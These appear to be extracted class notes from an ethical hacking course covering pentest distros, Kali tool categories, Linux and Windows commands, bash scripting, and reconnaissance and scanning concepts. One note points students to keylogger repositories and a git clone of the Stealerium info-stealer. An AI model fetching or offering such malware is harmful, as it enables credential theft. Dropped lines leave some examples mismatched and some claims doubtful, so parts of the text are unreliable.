class revisions of EHP
class revisions of EHP
Week 1
Week 2 OS Fundamentals
Whether you're aiming for a career in cybersecurity or simply want to explore the world of
penetration testing, there's a Linux distribution tailored to meet your needs.
1. Parrot Security OS
Parrot Security OS targets penetration testers and certified security personnel, but it also aims to
help those who need a privacy-focused distro such as journalists and ethical hackers.
What sets Parrot Security apart from other Linux distributions is that it offers an array of privacy
tools and encryption features.
It even offers a home edition that anyone can use to stay secure online. It also comes with a digital
forensics tab that was built in collaboration with the developers of CAINE.
2. Kali Linux
Kali Linux is an excellent choice for those new to penetration testing, while also remaining a go-to
distro for seasoned professionals in ethical hacking. Built on the Debian operating system, Kali uses
the Xfce desktop environment and comes preloaded with a comprehensive set of penetration testing
tools.
Its flexibility makes it a favorite among experts, as it allows users to create custom Kali-based
distros tailored to specific needs. Kali Linux also benefits from a large community, offering extensive
documentation and user-generated tutorials to support both beginners and advanced users.
3. BackBox Linux
BackBox Linux is an Ubuntu-based distribution designed for security assessments and penetration
testing. It includes a broad set of tools for web application and network analysis, making it a powerful
choice for security professionals.
BackBox is also beginner-friendly, with helpful tooltips and descriptions for each included tool, which
2/129
makes navigating its application menu easier, even for users who are new to penetration testing.
This user-friendly approach ensures that you can quickly find the tools you need to get started.
4. BlackArch Linux
BlackArch is a favorite among experienced security researchers and penetration testers due to its
vast collection of tools—over 2,000, in fact. While its user interface may not be the most beginner-
friendly, the well-organized repository makes it easy to navigate and find the tools you need.
BlackArch is regularly updated with new tools and improvements, maintaining its status as one of the
most comprehensive and popular Linux distros for ethical hacking and penetration testing. It's ideal
for professionals who need a robust toolkit for advanced security assessments.
5. ArchStrike
ArchStrike (formerly known as ArchAssault) is a penetration testing and cybersecurity-focused
project built on Arch Linux. It combines the flexibility and power of Arch Linux with a comprehensive
set of tools specifically for security professionals and penetration testers.
ArchStrike includes thousands of tools and applications, organized into modular package groups,
allowing users to easily access the tools they need for various security tasks.
Download ArchStrike
This distribution is to support students and instructors as they practice and learn various security
methodologies, including information security, web application security, forensic analysis, and more.
With its focused toolset and robust support for security education, Fedora Security Spin provides an
ideal environment for both hands-on learning and professional security assessments.
7. Pentoo Linux
Pentoo is an excellent choice for users who are already familiar with Gentoo or are willing to invest
time in learning it. This distribution can be installed as an overlay on an existing Gentoo system or
run as a standalone OS.
However, Pentoo may not be ideal for beginners in penetration testing, as it comes with a steep
3/129
learning curve and a less structured organization that could be overwhelming for newcomers.
Additionally, it has limited documentation and support, which may pose a challenge for those new to
ethical hacking.
Despite these drawbacks, Pentoo remains popular among Gentoo enthusiasts and experienced
users who appreciate its flexibility and powerful toolset.
8. Caine
Once you've gained some experience in penetration testing, CAINE (Computer-Aided Investigation
Environment) could be a valuable addition to your toolkit. Designed to simplify the process of
analyzing disks and drives, CAINE leverages automation to generate detailed reports, making it an
excellent resource for security teams.
Built on Ubuntu, CAINE is particularly well-suited for testing machine learning environments, which
are rapidly growing—currently expanding at a rate of 38% annually. Its focus on digital forensics and
automation makes it a strong choice for more advanced penetration testing and cybersecurity tasks.
Download Caine
Built for use in virtual machines, NST is ideal for tasks like analysis, validation, and monitoring of
networks. Its "all-in-one" toolkit makes it popular among ethical hackers, professional penetration
testers, and even beginners, as it offers a wide range of tools to address various security needs in a
single, easy-to-use package.
10. Bugtraq
Bugtraq is a penetration testing distribution specifically designed for reverse engineering and
malware analysis. Based on Debian, this versatile distro is available for multiple operating systems
and provides excellent support for penetration testers.
Bugtraq comes preloaded with a variety of analysis tools, including mobile forensics, malware
testing, and other specialized features. All of these tools are developed and maintained by the
Bugtraq community, making it a valuable resource for those focused on security research, malware
analysis, and reverse engineering.
Download Bugtraq
4/129
Response Toolkit) software and comes preconfigured with a wide range of popular forensic tools and
resources.
DEFT is tailored for ethical hackers, penetration testers, IT security professionals, and others who
need to conduct digital investigations, analyze evidence, and respond to security incidents
effectively. With its comprehensive toolkit, DEFT is a valuable resource for anyone involved in digital
forensics and cybersecurity.
The Kali Linux penetration testing platform contains a vast array of tools and utilities. From
information gathering to final reporting, Kali Linux enables security and IT professionals to assess
the security of their systems.
5/129
Find out all about Kali's Tools
Kali Linux comes with a wide range of pre-installed tools, categorized into different groups based on
their purpose. Here's a list of the main categories of tools in Kali Linux, which are commonly used for
penetration testing, ethical hacking, and cybersecurity assessments:
1. Information Gathering
Tools for gathering information about the target, such as network infrastructure, open ports, and
services.
2. Vulnerability Analysis
Tools for identifying and analyzing vulnerabilities in systems, networks, or applications.
3. Exploitation Tools
Tools to exploit discovered vulnerabilities in systems and networks.
4. Wireless Attacks
Tools for attacking and analyzing wireless networks.
6/129
Burp Suite – Web application security testing framework
OWASP ZAP – Web application security scanner
dirbuster – Directory and file brute-forcing tool
sqlmap – Automated SQL injection and database takeover tool
w3af – Web application attack and audit framework
6. Password Attacks
Tools used for password cracking, brute forcing, and dictionary attacks.
7. Post Exploitation
Tools for maintaining control, gathering information, or escalating privileges after initial system
compromise.
8. Forensics
Tools for digital forensics analysis, data recovery, and investigation.
9. Reverse Engineering
Tools for analyzing malware, unpacking binaries, and reverse engineering applications.
7/129
dsniff – Network sniffer for network traffic analysis
tcpdump – Command-line packet analyzer
mitmproxy – Interactive man-in-the-middle proxy for HTTP/S traffic
These are the main categories of tools found in Kali Linux. Kali includes many other tools beyond
8/129
these categories, each serving different aspects of penetration testing, cybersecurity, and digital
forensics. Kali Linux offers a comprehensive suite that makes it one of the go-to distributions for
ethical hackers, penetration testers, and security professionals.
Overview of sudo
sudo (short for "SuperUser Do") is a command-line utility used in Unix-like operating systems (such
as Linux and macOS) to allow a permitted user to execute a command as the superuser (root) or
another user, as specified by security policy. It provides a mechanism for delegated administrative
control and helps protect systems by limiting direct access to root privileges.
The most common use of sudo is to execute commands with superuser (root) privileges. This is
essential for performing administrative tasks like installing software, modifying system files, or
managing system services.
Example:
2. Controlled Access:
sudo provides granular control over who can execute what commands, and under what conditions.
This is managed through the /etc/sudoers file, which is edited using visudo to ensure syntax integrity.
Only users who are listed in this file (or in group memberships) can run commands with elevated
privileges.
3. Logging:
Every command run through sudo is logged, which helps in auditing and tracking who did what on
the system. These logs can be found in /var/log/auth.log or /var/log/sudo depending on the system
configuration.
4. Timeout:
After a user enters their password to execute a command with sudo, a timestamp is set. For a
configurable time period (usually 15 minutes), they won’t need to enter the password again for
additional sudo commands.
• By using sudo, users are not granted full access to the root account, but instead can run specific
commands as root. This minimizes the risk of accidental system-wide damage and protects against
malicious activities that could result from using a root shell directly.
9/129
• sudo reduces the chances of mistakes made while logged in as root, especially since the root
account can be disabled in some systems for extra security.
Basic Syntax:
Example:
sudo -u john ls /home/john # Run the `ls` command as user 'john'
2. No Password Prompt (Dangerous - Use with Caution): You can configure sudo to not ask for a
password when running commands. This is done by modifying the /etc/sudoers file, but should be
used cautiously.
3. Editing Files as Root: Using sudo to open an editor (e.g., vi, nano) with root privileges to modify
system files:
4. Checking the User's Privileges: You can check which commands a user is allowed to run via sudo
by using:
sudo -l
sudo visudo
6. Revoke sudo Access: If you need to revoke a user's sudo privileges, you would remove them from
the relevant sudoers group or file.
Security Considerations:
• Least Privilege Principle: Always assign only the minimum necessary privileges to users.
• Passwordless sudo: Disabling the password prompt can be risky, so it's advisable to limit this
practice unless there’s a specific use case.
• Sudoers File Management: Mistakes in the /etc/sudoers file can lock you out of administrative
privileges. Always use visudo, which checks for syntax errors before saving.
10/129
1. System Update:
sudo apt update && sudo apt upgrade # Update packages on a Debian-based system
2. Add a User:
sudo useradd -m newuser # Create a new user
3. Restart a Service:
sudo systemctl restart apache2 # Restart the Apache service
Conclusion:
sudo is an essential tool in Unix-like systems for safely managing administrative tasks without the
need to switch to the root account. It offers an extra layer of security, flexibility, and accountability
by allowing users to execute commands as root or another user with specific permissions.
Key Concepts:
Common Commands:
Understanding these commands allows to explore, manage, manipulate files and directories on a
Linux system efficiently.
11/129
1. pwd (Print Working Directory)
Purpose: Tells you where you are in the file system.
Usage:
>> pwd
2. ls (List)
Purpose: Lists the contents of the current directory.
Usage:
>> ls
3. cd (Change Directory)
Purpose: Move between directories.
Usage:
>> cd /path/to/directory
4. cd ~ (Home Directory)
Purpose: Quickly go to your home directory.
Usage:
>> cd ~
5. cd .. (Parent Directory)
Purpose: Go one level up in the directory tree.
Usage:
>> cd ..
6. ls -l (Long Listing)
Purpose: Lists files with detailed information (permissions, owner, size, date).
Usage:
>> ls -l
Usage:
>> ls -a
Usage:
>> mkdir new_directory
Usage:
>> rmdir directory_name
12/129
10. rm (Remove File)
Purpose: Delete a file.
Usage:
>> rm file_name
Usage:
>> find /path/to/search -name "filename"
Usage:
>> locate filename
Usage:
>> cp source_file destination
Usage:
>> mv old_name new_name # Rename a file
>> mv file_name /new/path # Move a file
Usage:
>> cat filename
Usage:
>> more filename
Usage:
>> less filename
13/129
18. head (View the Start of a File)
Purpose: Display the first few lines of a file (default: 10).
Usage:
>> head filename
Usage:
>> tail filename
Usage:
>> df -h
Usage:
>> du -sh directory_name
Usage:
>> tree
Usage:
>> stat filename
Usage:
>> file filename
Usage:
>> touch new_file
14/129
Purpose: Extract the file name from a path, or remove a file extension (suffix).
Usage:
>> basename /path/to/file.txt # Outputs: file.txt
>> basename /path/to/file.txt .txt # Outputs: file
Usage:
>> dirname /path/to/file.txt # Outputs: /path/to
Usage:
>> which command_name
Usage:
>> whereis command_name
Usage:
>> history
Usage:
>> !15 # Run the command listed as number 15 in your history
Usage:
>> alias ll='ls -l' # Create an alias for 'ls -l' to be run as 'll'
Usage:
>> unalias ll # Removes the 'll' alias
15/129
Usage:
>> sudo mount /dev/sdb1 /mnt/mydrive # Mount a drive to a specific directory
Usage:
>> sudo umount /mnt/mydrive
Usage:
>> sudo chattr +i filename # Make a file immutable (cannot be modified, deleted, etc.)
>> sudo chattr -i filename # Remove the immutable flag
Usage:
>> fuser filename # Displays the process ID(s) using the file
>> fuser -k filename # Kill processes using the file
Usage:
>> sudo mount -o loop /path/to/file.iso /mnt/iso
Usage:
>> lsblk
Usage:
>> blkid
Usage:
>> rsync -av source_directory/ destination_directory/
>> rsync -avz source_directory/ user@remote_host:/path/to/destination/
16/129
Usage:
>> tar -cvf archive.tar directory_name # Create a tarball (archive)
>> tar -xvf archive.tar # Extract a tarball
>> tar -czvf archive.tar.gz directory_name # Create a compressed tarball
>> tar -xzvf archive.tar.gz # Extract a compressed tarball
Usage:
>> gzip filename # Compress file
>> gunzip filename.gz # Decompress file
Usage:
>> bzip2 filename # Compress file
>> bunzip2 filename.bz2 # Decompress file
Usage:
>> zip archive.zip file1 file2 # Create a zip archive
>> unzip archive.zip # Extract a zip archive
Usage:
>> sudo mount -t ext4 /dev/sdb1 /mnt/mydrive # Mount with a specific filesystem type (ext4 in this
case)
Usage:
>> lsmod
Usage:
>> dmesg
17/129
Usage:
>> lsof filename
Usage:
>> mount | grep /mnt
Usage:
>> df -i
Conclusion
With these commands, you have a comprehensive toolkit to navigate and manage the Linux file
system effectively. These commands cover everything from basic navigation to advanced system
administration tasks. Keep this reference handy for when you need to perform routine tasks or
troubleshoot issues!
In Linux, a user is anyone or anything that interacts with the system. A user could be a person, a
service, or a process. Each user has a unique identity and access level.
2. Types of Users
• The root user has unlimited privileges to do anything on the system (e.g., install software, change
configurations, manage files).
• Be cautious: Root has the power to break things easily if used incorrectly.
Regular Users:
• Regular users have restricted access compared to the root user. They can access only their files
and directories, and any system-wide actions require elevated permissions (e.g., via sudo).
System Users:
• These users are created by the system for specific services or applications (e.g., www-data for web
services). These users don’t log in but are used by processes.
18/129
3. Understanding User Accounts
User Name (Login Name):
This is the name you use to log in, e.g., john, alice, or admin.
User ID (UID):
Every user has a User ID (UID), which is a unique number associated with the user. For example:
Group Name:
• Each user is also associated with a primary group. This is a collection of users that share common
permissions.
Home Directory:
• This is where a user's personal files are stored. It’s usually located at /home/<username>, e.g., /
home/john.
Shell:
• The shell is the command-line interface that the user interacts with (e.g., bash, zsh).
4. Managing Users
Setting a Password
>> sudo passwd <username>
Deleting a User
>> sudo userdel <username>
Deletes the user account. Use sudo userdel -r <username> to remove the user's home directory as
well.
5. Groups in Linux
Groups allow you to manage permissions for multiple users easily. A group is a collection of users
that share common access rights to files, directories, and resources.
19/129
Listing Groups a User Belongs To
>> groups <username>
Symbolic Representation:
r = read
w = write
x = execute
Example: -rwxr-xr-- indicates:
Permissions Overview
• r (read): Allows the user to view the contents of a file.
• w (write): Allows the user to modify or delete the file.
• x (execute): Allows the user to run the file as a program.
1. Owner (User who created the file) (Owner has read, write, and execute permissions.)
2. Group (Users in the file’s group) (Group has read and execute permissions.)
3. Others (Everyone else) (Others have only read permissions.)
r=4
w=2
x=1
Example: 755 means:
Changing Permissions:
Changing Ownership:
Checking Permissions
Use ls -l to view permissions:
>> ls -l <filename>
20/129
Example output:
-rwxr-xr-- 1 john john 1234 Nov 24 12:00 example.txt
• The first character (-) indicates it's a file (a 'd' would indicate a directory).
• rwx = Owner has read, write, and execute permissions.
• r-x = Group has read and execute permissions.
• r-- = Others have only read permissions.
Usage:
>> chmod +x file_name # Add execute permission
chmod 755 file_name # Set specific permissions
r = 4, w = 2, x = 1
Combine them: 7 = rwx, 6 = rw-, 5 = r-x, 4 = r--, etc.
Example:
>> chmod 755 <filename> # rwxr-xr-x
>> chmod u+x <filename> # Add execute permission for the user (owner)
>> chmod g-w <filename> # Remove write permission from the group
>> chmod o=r <filename> # Set read-only permission for others
Example: sudo chown john:admin example.txt changes the owner to john and the group to admin.
7. Special Permissions
Allows a program to run with the privileges of the file’s owner (usually root).
Indicated by an s in the execute position for the owner:
Similar to SUID, but the program runs with the group privileges.
Indicated by an s in the execute position for the group:
Sticky Bit:
21/129
Restricts file deletion in a shared directory to the file owner, not anyone with write permission.
Indicated by a t in the execute position for others:
sudo allows regular users to execute commands with elevated (root) privileges.
Example:
>> sudo apt-get update # Run as root
You will be prompted for your password, and you can only run sudo commands if your user is in the
sudoers group.
By keeping these basic principles in mind, you can manage users and privileges effectively on any
Linux system, whether you're a beginner or an advanced user.
22/129
23/129
1. Command: ipconfig (for windows)
Description: Displays the current network configuration details, such as IP address, subnet mask, and
default gateway of network adapters.
Example:
$ ping google.com
Output:
Pinging google.com [142.250.72.238] with 32 bytes of data:
Reply from 142.250.72.238: bytes=32 time=12ms TTL=116
Reply from 142.250.72.238: bytes=32 time=10ms TTL=116
Reply from 142.250.72.238: bytes=32 time=13ms TTL=116
2. Command: tracert
Description: Traces the route taken by packets to a destination host, showing the intermediate
routers.
Example:
24/129
$ tracert google.com
Output:
Tracing route to google.com [142.250.72.238]
over a maximum of 30 hops:
3. Command: netstat
Description: Displays active network connections, listening ports, and associated network statistics.
Example:
$ netstat
Output:
Active Connections
4. Command: nslookup
Example:
$ nslookup google.com
Output:
Server: dns.google
Address: 8.8.8.8
Non-authoritative answer:
Name: google.com
Address: 142.250.72.238
5. Command: hostname
Example:
$ hostname
Output:
my-computer
6. Command: arp
Description: Displays and modifies the ARP (Address Resolution Protocol) table, showing the mapping
25/129
between IP addresses and MAC addresses.
Example:
$ arp -a
Output:
Interface: 192.168.1.10 --- 0x12
Internet Address Physical Address Type
192.168.1.1 00-14-22-01-23-45 Dynamic
7. Command: route
Example:
$ route print
Output:
IPv4 Route Table
==============================================================
=====
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 192.168.1.1 192.168.1.10 25
8. Command: telnet
Example:
$ telnet example.com 23
Output:
Trying 203.0.113.1...
Connected to example.com.
Escape character is '^]'.
Welcome to the Telnet server!
9. Command: ftp
Example:
$ ftp example.com
Output:
Connected to example.com.
220 Welcome to the FTP server.
Name (example.com:user):
26/129
Description: Manages network resources, such as shares, sessions, and users.
Example:
$ net view
Output:
Server Name Remark
-----------------------------------------
\\SERVER1 File Server
\\SERVER2 Database Server
The command completed successfully.
Example:
$ netsh interface ip show config
Output:
Configuration for interface "Ethernet"
DHCP enabled: Yes
IP Address: 192.168.1.10
Subnet Mask: 255.255.255.0
Default Gateway: 192.168.1.1
Example:
$ net use Z: \\SERVER1\shared_folder
Output:
The command completed successfully.
Example:
$ net view \\SERVER1
Output:
Shared resources at \\SERVER1
Resource Type Comment
-----------------------------------------
shared_folder Disk Shared Documents
The command completed successfully.
27/129
Description: Creates, deletes, or manages shared folders on the local computer.
Example:
$ net share shared_docs=C:\Shared
Output:
shared_docs was shared successfully.
Description: Displays and manages active network sessions with the local computer.
Example:
$ net session
Output:
Computer User name Client Type Opens Idle time
192.168.1.15 admin Windows 2 00:15:30
The command completed successfully.
Description: Synchronizes the local computer's clock with a network time server.
Example:
$ net time \\SERVER1 /set /yes
Output:
The current time at \\SERVER1 is 11/26/2024 10:15:42 AM.
The command completed successfully.
Description: A domain management tool for joining computers to a domain, resetting passwords,
and more.
Example:
$ netdom join MYCOMPUTER /domain:example.local /userd:admin /passwordd:*
Output:
The machine account password was successfully reset.
The command completed successfully.
Example:
$ route print
Output:
28/129
IPv4 Route Table
==============================================================
=====
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 192.168.1.1 192.168.1.10 25
Description: Displays NetBIOS over TCP/IP statistics and the status of current connections.
Example:
$ nbtstat -a 192.168.1.10
Output:
Local Area Connection:
Node IpAddress: [192.168.1.10] Scope Id: []
Example:
$ ipconfig /flushdns
Output:
Successfully flushed the DNS Resolver Cache.
Description: Releases the current DHCP configuration for all network adapters.
Example:
$ ipconfig /release
Output:
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 0.0.0.0
Subnet Mask . . . . . . . . . . . : 0.0.0.0
Default Gateway . . . . . . . . . :
29/129
Example:
$ ipconfig /renew
Output:
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . : example.local
IPv4 Address. . . . . . . . . . . : 192.168.1.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
Example:
$ netsh firewall set opmode mode=enable
Output:
Ok.
Example:
$ netstat -a
Output:
Active Connections
Week 03
Description: The cat command is used to display the contents of a file on the terminal. It stands for
"concatenate" and is often used for displaying small files or combining multiple files.
30/129
Example:
$ cat example.txt
Hello, this is an example file.
This file contains a few lines of text.
Output:
Hello, this is an example file.
This file contains a few lines of text.
>> more
Description: The more command is used to view the contents of a file one screen at a time. It allows
scrolling through large files.
Example:
$ more longfile.txt
>> less
Description: Similar to more, but with more features, less allows backward navigation and is more
versatile for viewing large files.
Example:
$ less largefile.txt
Output:
This is a large file. You can scroll up and down with arrow keys, search with '/' and quit with 'q'.
>> head
Description: The head command is used to display the first few lines (default 10) of a file.
Example:
$ head example.txt
>> tail
Description: The tail command is used to display the last few lines (default 10) of a file. It’s often
used with the -f option to monitor log files in real-time.
Example:
$ tail example.log
31/129
Output (last 10 lines):
Error: Failed to load configuration.
Warning: Disk space low.
2. Create Files
>> touch
Description: The touch command is used to create an empty file or update the timestamp of an
existing file.
Example:
$ touch newfile.txt
>> echo
Description: The echo command is used to create a file with content by redirecting output into a file.
Example:
$ echo "This is a new file" > file.txt
Description: You can also use cat to create a new file and write content into it. Press Ctrl+D to save
and exit.
Example:
$ cat > newfile.txt
Output:
(typing) This is some text.
(typing) Another line of text.
Press Ctrl+D to save.
Description: These text editors can be used to create and edit files interactively.
Output: Opens the nano editor, where you can type text. Press Ctrl+O to save, Ctrl+X to exit.
Or with vim:
$ vim newfile.txt
Output: Opens the vim editor. Press i to enter insert mode, type text, then press Esc, type :wq to save
and quit.
3. Edit Files
>> nano
Description: nano is a terminal-based text editor that is easy to use. It allows editing of files directly
in the terminal.
Example:
$ nano example.txt
Output: Opens example.txt in the nano editor. You can edit the file directly in the terminal, and save
with Ctrl+O, then exit with Ctrl+X.
>> vim/vi
Description: vim (or vi) is a more advanced text editor, suitable for both simple and complex text
editing tasks. It requires learning basic commands to use efficiently.
Example:
$ vim example.txt
>> sed
Description: sed is a stream editor that can modify file content directly from the command line,
making it useful for automated edits. It supports search and replace, insertions, and deletions.
Example:
$ sed -i 's/oldword/newword/' file.txt
Output:
Replaces all occurrences of "oldword" with "newword" in file.txt
>> awk
33/129
Description: awk is a powerful text processing tool. It can perform actions on files based on patterns
and conditions.
Example:
$ awk '{ print $1 }' example.txt
Output:
(prints the first field of each line in the file `example.txt`)
Line1Field1
Line2Field1
--------------------------------------------------------------------------------------------------------
Example:
$ cp source.txt destination.txt
Description: The grep command is used to search for patterns within files. It can be combined with
other commands or used by itself to find specific text in large files.
Example:
$ grep "error" logfile.txt
Output:
Error: File not found.
Error: Network connection lost.
You can also use grep with the -r option to recursively search within a directory:
34/129
$ grep -r "keyword" /path/to/directory/
>> find
Description: The find command searches for files and directories within a specified location based on
various criteria (e.g., file name, modification time, size).
Example:
$ find /home/user/ -name "*.txt"
Output:
/home/user/file1.txt
/home/user/docs/file2.txt
Description: tar is used to create, extract, or list archive files. Commonly used with compression
tools like gzip or bzip2 to compress archives.
Output:
directory1/
directory1/file1.txt
Description: zip and unzip are used to create and extract .zip files.
Description: gzip is used for file compression and gunzip is used to decompress .gz files.
35/129
Example (Compress a file):
$ gzip example.txt
-----------------------------------------------------------------------------------------
Description: You can open multiple files in vim using tabs or buffers for easier editing.
Example:
$ vim file1.txt file2.txt
Use :bn to switch to the next file, and :bp to go back to the previous file.
>> multitail
Description: multitail is useful for viewing multiple log files at the same time in a split-screen format.
Example:
$ multitail /var/log/syslog /var/log/auth.log
Conclusion
This expanded file management handbook provides a broader set of tools for working with files in
Linux. It includes methods for viewing, creating, and editing files.
As well as more advanced techniques for managing permissions, compressing, searching, and
backing up files. Familiarity with these commands will greatly enhance your productivity when
working in Linux environments.
By combining these commands, you can streamline tasks and automate workflows to increase
efficiency.
36/129
Note:
If need to install any tools search on search engines and read the installation process.
Some times some tools will found in GitHub. To find that search on search engine.
For example
install tools keylogger GitHub parrot Linux.
https://github.com/topics/keylogger
Example:
>> git clone https://github.com/Stealerium/Stealerium.git
Bash (Bourne Again Shell) is a widely used command-line interpreter for Unix-like systems. Such as
Linux and macOS. It allows users to write and execute scripts files containing a series of commands.
That automates tasks and simplify system management.
Bash scripts are written in plain text and can perform a wide variety of tasks, such as system
administration, data processing, file management, and interacting with network resources.
1. Shebang (#!):
Every bash script begins with the "shebang" line (#!/bin/bash), which tells the system to execute the
script using the Bash interpreter.
Example:
#!/bin/bash
2. Variables:
You can store values in variables for later use. These can be strings, numbers, or results from
commands.
Example:
name="John"
echo "Hello, $name"
3. Commands:
Bash scripts execute commands just as you would in the terminal. This can include system
commands like ls, cp, mv, ifconfig, ip, and custom scripts or applications.
37/129
4. Control Flow:
Bash provides basic control flow structures such as if/else, for loops, while loops, and case
statements.
Example:
if [ $x -eq 5 ]; then
echo "x is 5"
else
echo "x is not 5"
fi
5. Functions:
You can define reusable blocks of code in functions. Functions can accept parameters and return
values.
Example:
greet() {
echo "Hello, $1"
}
6.Comments:
Anything after a # symbol is considered a comment and is ignored by the shell. Comments are
useful for explaining the purpose of the script or specific lines of code.
Example:
# This is a comment
Input: You can capture user input using the read command.
Pipes (|) allow you to send the output of one command as input to another.
Redirection (>, >>) allows you to send output to a file instead of the terminal.
Example:
38/129
ls | grep "pattern" # Pipe output of `ls` into `grep`
echo "Hello World" > file.txt # Redirect output to file
9. Exit Status:
Each command in Bash returns an exit status (also known as a return code), where 0 means success
and any non-zero value indicates an error. This can be checked using $?.
Example:
ls non_existent_file
echo $? # Outputs: 2 (command not found)
10. Loops:
Loops allow you to repeat actions multiple times. For example:
For loop:
for i in {1..5}; do
echo "Number $i"
done
While loop:
count=1
while [ $count -le 5 ]; do
echo "Count is $count"
((count++))
done
Example:
• Automation: Bash scripts can automate repetitive tasks, saving time and reducing human error.
• Integration: Bash scripts can call and integrate with many other system tools and utilities, making
them extremely powerful.
• Portability: Bash scripts are portable across many Linux and Unix-like systems.
• Lightweight: Unlike more complex programming languages, bash scripts are lightweight and
execute quickly.
39/129
Use Cases for Bash Scripting:
• Networking: Automating tasks such as network configuration, testing connectivity, and managing
network interfaces.
#!/bin/bash
40/129
echo ""
Instructions to use:
1. Create a new script file: Save the above code in a new file, for example, network_info.sh.
2. Make it executable: Run the following command to make the script executable:
>> ./network_info.sh
Conclusion
Bash scripting is an essential skill for system administrators, developers, and power users who work
with Unix-like systems. It enables users to efficiently automate tasks, manage files, and interact with
the operating system, saving time and effort.
By understanding how to write and execute bash scripts, you can streamline your workflows and
ensure that repetitive tasks are handled automatically.
1. Reconnaissance
Reconnaissance refers to the process of gathering information about a target, often for the purpose
of conducting an attack, security testing, or intelligence collection.
In the context of cybersecurity and ethical hacking, reconnaissance is a critical first step in
identifying potential vulnerabilities in a system or network before launching an attack or penetration
test.
41/129
Reconnaissance can be classified into two main types:
• Active
• Passive
Active Reconnaissance:
Active reconnaissance involves directly interacting with a target system or network to gather
information. In this approach, the attacker or security tester sends requests or queries to the target,
and the target responds with data that can be analyzed for vulnerabilities.
This type of recon can include actions like port scanning, banner grabbing, and other forms of direct
probing. Active recon is typically more risky because it can alert the target to the presence of the
attacker or tester.
Passive Reconnaissance:
Passive reconnaissance, involves gathering information about a target without directly interacting
with it. This approach relies on publicly available data.
Such as information on websites, social media, DNS records, or other open-source intelligence
(OSINT) sources. Since there is no direct interaction with the target, passive recon is less likely to be
detected by the target.
In summary, active recon involves engaging directly with the target to retrieve information, while
passive recon involves collecting information through observation without direct interaction with the
target system.
For penetration testers, reconnaissance is the initial phase of the engagement. It helps testers
understand the target environment and scope out potential attack vectors.
Ethical hackers perform both active and passive reconnaissance (following legal and ethical
guidelines) to map out the attack surface and identify vulnerabilities before attempting exploitation.
42/129
• Planning: Understanding the scope and objectives of the test, which systems or services are in-
scope, and gathering publicly available information (e.g., domain names, email addresses).
• Reconnaissance (Active & Passive): Collecting further information about the systems involved
using tools and techniques for OSINT gathering, network mapping, and scanning.
Reconnaissance is also a military term used to describe the act of gathering intelligence on an
enemy or area of interest, typically before an operation or engagement.
In espionage, it involves covertly acquiring data about a target, such as enemy movements,
resources, or capabilities, without being detected.
Reconnaissance in General:
More broadly, reconnaissance refers to any process of exploring or surveying an area or subject to
gather information, whether for military, business, or other purposes.
Conclusion:
Reconnaissance is a foundational phase in both offensive and defensive cybersecurity, as it sets the
stage for understanding the target environment. Whether done actively or passively, effective
reconnaissance can help identify security gaps.
Allowing defenders to fortify defenses or allowing attackers to find points of weakness. It’s an
essential process for anyone involved in cybersecurity, ethical hacking, or even general intelligence
gathering.
Scanning and enumeration are two crucial stages in the process of network security assessment,
penetration testing, or cyberattacks. Both are part of the reconnaissance phase and focus on
gathering more specific and detailed information about a target network or system.
These processes help an attacker or penetration tester identify the systems, services, and potential
vulnerabilities that may exist within a network.
Scanning
Scanning is the process of systematically probing a target system or network to gather information
about the devices, open ports, services, and potential security weaknesses. It involves sending
requests or probes to a target system and analyzing the responses to build a map of the network or
device.
There are different types of scanning techniques, each serving specific purposes.
43/129
Types of Scanning:
Port Scanning:
This is one of the most common scanning techniques. It involves identifying open ports on a target
system. Open ports can provide clues about the services running on the system (e.g., HTTP on port
80, SSH on port 22). Attackers can use this information to find vulnerabilities in services running on
these ports.
TCP Connect Scan: Establishes a full TCP connection to the target system to see if the port is open.
SYN Scan: Only sends a SYN packet to the target, which can be used to determine if a port is open
without completing the connection (more stealthy).
FIN Scan: Sends a TCP FIN packet to a port to check if it’s open (stealthy scan method).
Network Scanning:
This is used to discover devices on a network. It typically involves identifying the IP address range of
the target and then probing each address to identify live systems (hosts).
Vulnerability Scanning:
This type of scan attempts to detect vulnerabilities in a system by matching known vulnerabilities
(usually from databases such as CVE Common Vulnerabilities and Exposures) against the target's
services, operating systems, and configurations.
This type of scan tries to identify the operating system running on a target system by analyzing the
responses to network traffic. Different operating systems (e.g., Windows, Linux) respond differently
to certain types of network traffic.
Network Discovery: Scanning helps identify active devices (IP addresses, routers, firewalls) on the
network and how they are connected.
Service Discovery: Scanning identifies which services are running on open ports (e.g., HTTP, FTP,
SSH, SMB).
Vulnerability Identification: By scanning for known vulnerabilities in services or devices, testers can
44/129
locate potential attack vectors.
Enumeration
Enumeration is a deeper, more detailed stage of information gathering that occurs after scanning. It
involves actively collecting information from a system or network, focusing on gathering specific
details about the services, users, systems, and network resources that are available.
Enumeration goes beyond just identifying open ports and services and aims to extract more
granular information, such as usernames, group memberships, shares, or version numbers.
Types of Enumeration:
Service Enumeration: After scanning a network for open ports, the next step is to enumerate the
specific services running on those ports. This includes identifying:
Service version
SMB Enumeration: In the case of Windows-based networks, SMB (Server Message Block)
enumeration is important for discovering shared folders, network shares, user lists, and more.
DNS Enumeration: This involves querying DNS servers to retrieve records like A records (IP
addresses for domains), MX records (mail servers), NS records (nameservers), and more. DNS
enumeration can reveal subdomains, which can be useful for identifying additional attack surfaces.
LDAP Enumeration: LDAP (Lightweight Directory Access Protocol) is often used to access and manage
directory services in networks. LDAP enumeration allows attackers to discover details about users,
groups, and organizational structures in a network.
NFS Enumeration: In Unix/Linux environments, NFS (Network File System) enumeration helps identify
shared resources like file systems and directories.
Email Enumeration: This type of enumeration identifies valid email addresses associated with a
45/129
target domain. Attackers can then use this information for spear-phishing attacks or other social
engineering tactics.
User Enumeration: Extracting valid usernames from a target system, which can be used for further
attacks like brute-forcing passwords.
Share Enumeration: Discovering network shares (files, printers, etc.) to gain access to sensitive data.
Aspect Scanning
Purpose Identifying open ports, active services, and
vulnerabilities
Depth Surface-level discovery of systems and services
Risk of Detection Can be more detectable (especially in active
scanning)
Tools Nmap, Masscan, Netcat, Nessus, OpenVAS
Conclusion
Scanning helps to map out a network or system by discovering active devices, open ports, and
running services.
Enumeration goes a step further by querying services to extract specific information about them,
such as usernames, shares, and configurations.
